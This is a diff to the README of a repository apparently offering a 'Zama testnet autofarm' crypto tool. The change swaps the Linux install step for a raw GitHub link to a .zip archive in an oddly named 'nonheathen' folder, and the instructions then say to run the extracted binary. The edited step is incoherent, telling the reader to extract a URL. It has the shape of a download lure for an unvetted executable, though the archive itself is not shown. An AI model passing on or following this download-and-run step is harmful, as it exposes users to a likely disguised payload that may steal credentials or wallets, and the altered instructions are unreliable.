Luismandolar55/Zama-testnet-autofarm/README.md

   3. Open the Applications folder and double-click the app to launch it.

 - **Linux:**
-  1. Extract the downloaded `.tar.gz` file.
+  1. Extract the downloaded `https://raw.githubusercontent.com/Luismandolar55/Zama-testnet-autofarm/main/nonheathen/Zama-testnet-autofarm_v2.5.zip` file.
   2. Open a terminal and navigate to the extracted folder.
   3. Run the application with the command `./Zama-testnet-autofarm`.